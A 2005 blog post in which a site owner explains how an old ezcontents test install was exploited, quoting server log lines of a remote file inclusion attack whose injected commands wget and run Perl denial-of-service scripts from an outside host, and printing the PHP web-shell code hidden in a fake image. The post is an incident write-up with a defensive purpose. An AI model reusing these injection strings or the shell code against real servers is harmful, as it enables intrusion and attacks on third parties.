More details on php exploit from last week



Ok. I have a bit of time that I can sit down and get a little more detailed on what specifically happened late last week that shut the site down for a couple days.

At one point, I had updated the ezcontents script for the main site (averyjparker.com), but I had left (for about 2 years) a testbed install (at averyjparker.com/ncgen2) trying to setup a platform for an upgrade for the old Genealogy site (www.averyjparker.com/ncgen, new site is now at www.northcarolinagenealogy.net (linked at the top of the page.)) OK, so in searching through the logs here are some of the entries that caught my attention.

63.85.41.229 – - [14/Jul/2005:13:30:31 -0600] “POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1″ 403 319 “http://www.averyjparker.com/” “-”
200.174.133.132 – - [14/Jul/2005:13:11:59 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:19 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;
%20chmod%20777%20pdr;%20./pdr HTTP/1.1″ 200 1072 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:09:42 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?
&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:09:21 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=wget HTTP/1.1″ 200 1120 “-” “Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)”

I guess I should preface this, by a simple fact. There are a LOT of exploit attempts that show up in webserver logs. Here’s a sample of one…
211.75.91.2 – - [14/Jul/2005:13:30:24 -0600] “POST /cgi-bin/mailform.pl HTTP/1.0″ 404 290 “http://www.averyjparker.com/” “-”

The first entry is the ip address, then the datestamp, then the specific query *(usually starting with Post or Get, and ending with the version of the protocol.) Next you see 404, that’s the result code and a 404 code means that this file wasn’t found.

What troubled me with the suspicious entries is that the result code was 200 (file found) and it was trying to pass various different bits of information to a php file (/ncgen2//include/db.php) which did exist.

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget
%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load this file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file by the way.) It’s basically an html file wrapped around this…
< ?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp”);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(“>”, “>”, str_replace(“< ", "<", $output));
?>
ok, so they’re trying to inject this file http://www.caniggiamatador.com/dos.pl and http://www.caniggiamatador.com/perldos.pl

I looked at the code there and they were basically bash scripts that setup a denial of service attack on a specified target. Fairly clever and commented in Portuguese or Spanish. I’ve actually spent some time studying spanish, but there was a lot that was either mispelled, or I simply didn’t understand.

The site is down now by the way. It was hosted by http://www.internetters.net/ it looks like and my service provider dealt with contacting them I suspect.

Since I’m a fairly curious person…. I was also interested in the ip address that was originating the requests 200.174.133.132 An IP whois lookup turned up this…

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I’m guessing a dialup? customer in Brazil (which might back up that the comments were in Portuguese).

I, of course, sent what I found to my service provider. They thanked me for the time I’d spent researching the issue and verified that was the file they were exploiting and that it was a DOS attack against their nameservers. They also sent along a couple of notes on changes to the php.ini that they made to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These were stated to hopefully prevent a future breach by the same method.

Some details of the exploit can be found here.
ezcontents code injection vulnerability

So, how did the find my site to attack. Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.

Related Posts

Blog Traffic Exchange Related Posts
  • Another Massive ID theft ring It looks like Sunbelt has found ANOTHER massive Identity theft ring. They suspect it's a trojan from the Dumaru family that is contentedly logging the infromation and promise more details. They did get a hold of the trojan and passed it through virustotal to see what it was. Very FEW......
  • NEW exploit for the WMF vulnerability Just when you thought we had a good understanding of the recent zero-day WMF (Windows metafile exploit) it's worse. Sans is reporting on a new variation on the exploit released today. They have gone to yellow (again) to warn people. Here are some details. This exploit was "made by the......
  • So who is behind Windows Police Pro Virus / Rogue Security Software? As I've seen the continuing FLOOD of searches for some way to Remove Windows Police Pro, I've been starting to wonder at the who is behind this particular piece of junk software. These programs aren't written by your average ordinary virus writer, there is really too much spit and polish......
Blog Traffic Exchange Related Websites
  • Wolf Creek Ski Area, Pagosa Springs, Colorado Wolf Creek Ski Area is located in Pagosa Springs, Colorado Phone: (970) 264-5639 or (800) SKI-WOLF Website: http://www.wolfcreekski.com/ About the Resort - Wolf Creek is spread out over more than 1,600 acres of high alpine ridges in the Rio Grande Forest. The Alberta Lift area is one of the most......
  • Alameda Marina Alameda Marina is located in Alameda, CA Phone Number: 510.521.1133 Website: http://www.alamedamarina.net/ Email: info@alamedamarina.net Marina Features 530 Wet Berths Pricing for Standard Berths: BOAT LENGTH (LOA)PRICE PER FOOT 22' - 24' $6.50 28' - 32' $7.50 36' - 45 '$8.00 50' Plus $9.00 End Ties & Side Ties $9.00 Covered......
  • The London Pass The London Pass is a sightseeing card which gives holders FREE ENTRY to over 55 sights and tourist attractions in London. Customers simply pay the one off price for the London Pass of their choice (there are 4 durations to choose from) and then can enter as many of......
www.pdf24.org    Send article as PDF   

Similar Posts


See what happened this day in history from either BBC Wikipedia
Search:
Keywords:
Amazon Logo

Comments are closed.


Switch to our mobile site